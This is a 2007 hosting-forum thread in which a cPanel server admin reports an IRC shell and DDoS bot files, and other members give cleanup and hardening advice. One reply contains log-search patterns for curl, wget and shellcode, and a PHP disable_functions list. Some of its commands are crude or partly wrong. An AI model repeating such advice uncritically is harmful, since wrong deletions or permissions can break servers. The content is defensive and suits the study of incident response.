The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked?

Discussion in 'General Discussion' started by benNICHOLAS, May 28, 2007.

  1. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Looks like one of my server has been hacked. :mad:

    In /tmp i have the following files:

    /tmp/QZVQKY21
    /tmp/scan.txt

    I attach the files if anyone want to see what they contains.

    How bad is this? Can I only remove the files or do anyone know what to do?

    Thanks and regards!
     

    Attached Files:

  2. ChadE

    ChadE Active Member

    Joined:
    Mar 14, 2005
    Messages:
    32
    Likes Received:
    0
    Trophy Points:
    6
    The first file looks like an IRC shell and the second file has content that implies that someone is trying to turn your server into a zombie machine for the purpose of launching DDoS attacks. I would delete them immediately. Depending on how you were infected, it's possible they either injected these scripts remotely and the rest of your machine is still safe. However, your logs will be unreliable if they have gained total root access.

    Do you run RK Hunter? Also, do you have any firewalls, bruteforce scanners?

    I run RKhunter to find rootkits, APF/BFD for bruteforce and basic firewalling of my unneeded ports, and also a regular NMAP port scan. If you're running potentially insecure PHP scripts, you may benefit by using mod_security 1.X or 2.X (depending on your Apache version.)

    Also, check here for making your /tmp folder non-executable:
    http://www.eth0.us/tmp

    Other useful links:
    http://www.eth0.us/sysctl
    http://www.rootkit.nl/
    http://www.rfxnetworks.com/proj.php

    Also, do you provide shared hosting or do you just host a couple of websites?
     
    #2 ChadE, May 28, 2007
    Last edited: May 28, 2007
  3. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Thanks for your reply.

    I have deleted the files.

    I run ConfigServer Security & Firewall which they have configured and installed for me. I also use mod_security.

    This server is used for shared hosting, about 340 accounts.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    The most common means of protecting a network is using a firewall. The biggest problem with firewalls is that people think they're more than they actually are. A firewall's major strength is protecting against traffic-based attacks (DoS,or DDoS, etc.). If hackers/spammers find their way into your network from the outside, it is very likely the firewall has no way of differentiating between a legitimate user and a hacker..

    Running a firewall and scanning tools including rkhunter and chkrootkit are not enough. You need to find and patch the offending scripts used by this amateur hacker. Otherwise, you might find more scripts like QZVQKY21 and scan.txt somewhere on your server.
     
  5. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    I run chkrootkit now and get this:

    /proc/28755/fd: No such file or directory

    /var/www/mrtg/tcp.log

    /usr/lib/php/.registry /usr/lib/php/.registry/.channel.pecl.php.net /usr/lib/php/.registry/.channel.__uri /usr/lib/php/.channels /usr/lib/php/.channels/.alias
    INFECTED (PORTS: 465)
    You have 3 process hidden for readdir command
    You have 3 process hidden for ps command
    chkproc: Warning: Possible LKM Trojan installed

    Anyone who know how to solve this?
     
  6. eNetHosts

    eNetHosts Well-Known Member

    Joined:
    Apr 21, 2007
    Messages:
    195
    Likes Received:
    0
    Trophy Points:
    16
    Have you changed your root password yet?

    How many of the 340 accounts are allowed to use SSH?
     
  7. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0

    I changed the password now.

    About 10 accounts have SSH access.
     
  8. eNetHosts

    eNetHosts Well-Known Member

    Joined:
    Apr 21, 2007
    Messages:
    195
    Likes Received:
    0
    Trophy Points:
    16
    Would recommend for the time being until this gets sorted to deny their SSH access.

    Unless you explicitly trust any of them.
     
  9. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Now only root have SSH access.

    Anyone know what to do with /usr/lib/php/.registry /usr/lib/php/.registry/.channel.pecl.php.net /usr/lib/php/.registry/.channel.__uri /usr/lib/php/.channels /usr/lib/php/.channels/.alias

    Can i remove those folders?
     
  10. eNetHosts

    eNetHosts Well-Known Member

    Joined:
    Apr 21, 2007
    Messages:
    195
    Likes Received:
    0
    Trophy Points:
    16
    We have these directories on our new VDS which doesn't currently have any users on it, except staff.

    I would say no because they look like a part of the o/s or cPanel setup.

    Any unusual processes running or excessive CPU usage showing? (via cPanel)
     
    #10 eNetHosts, Jun 2, 2007
    Last edited: Jun 2, 2007
  11. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Thanks!

    No unusual processes and the CPU load is now fine. Guess i have to monitor it for a while.
     
  12. WhmSonic

    WhmSonic Well-Known Member

    Joined:
    Mar 19, 2007
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Looks like someone trying to use your server for botnet attack. You are not done ! I check your exploits and this exploits coming from any website you hosted Forum / Upload or php script security problem.

    - You must find which website cause that problem, or people load exploit again.

    First you must sure your server is not running another httpd. This exploits create another simple httpd service for botnet attack.

    How To Check:
    Code:
    service httpd stop;ps auxwww | grep httpd
    You have been stop root httpd service. Then you checked for httpd with aux command if you see any httpd running with nobody owner after stop root httpd this mean you have still exploits and your server running botnet. If show nothing maybe botnet is not running but you maybe have exploits you must sure. Remember to start your apache service httpd start

    - Update the slocate database and search for exploits this will take 10 - 15min
    Code:
    updatedb
    When complete continue below.

    - Search for curl|wget|chmod|gcc|perl scripts in the logs this will show you which website uploaded shell scripts to their website or which website has been have security problem and hacker was use.
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
    - Search for shell code:
    Code:
    cat /usr/local/apache/logs/* |grep "/x90/"
    - Search for hidden dirs
    Code:
    locate "..."
    locate ".. "
    rlocate " .."
    locate ". "
    locate " ."
    - Search for perl-scripts running ( Important %99 exploits coded with perl lang. ) Check if any nobody user running perl on your server it will %99 exploit
    Code:
    ps -aux | grep perl

    - Alot of times attackers will save their files to look similar to session files
    Code:
    rm -rf /tmp/sess*
    Also check /var/tmp dir for error_log file if you see this file do not delete it open it and read it because this file is your gun, open this file and read you will see access errors blabla bla and /home/username/public_html/forum or file If you have luck thats it you find the which website have security problem on your server so suspend this website or remove his problem script file.

    Disable some important php functions in your php.ini this is very important to secure your server from customer mistake's.

    Open your php.ini file if you are using ZendOptimizer pico /usr/local/Zend/etc/php.ini if you are not using Zend your php.ini will be pico /usr/local/lib/php.ini

    open your php.ini and find the line disable_functions and add below functions to disable_function
    Code:
    system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,allow_url_fopen
    your php.ini will be like this:
    Code:
    disable_functions = system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,allow_url_fopen
    save your php.ini and restart your apache.

    Make little chmod to /home and / for force shell customers and all users to can see only their self /home/username if you dont give this chmod's who have ssh access on your server also some php scripts,perls, they will see your /home and other user files.

    Code:
    chmod 751 /home
    chmod 751 /etc
    chmod 751 /
    I hope I provided nice information to you and you can solve your problem. If you cant just send me pm on the forum I will help you more.
     
    #12 WhmSonic, Jun 3, 2007
    Last edited: Jun 3, 2007
  13. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Thank you verry verry much WhmSonic.

    I'll go through your steps as soon as possible.
     
Loading...
Similar Threads - Hacked
  1. xtronica
    Replies:
    9
    Views:
    658

Share This Page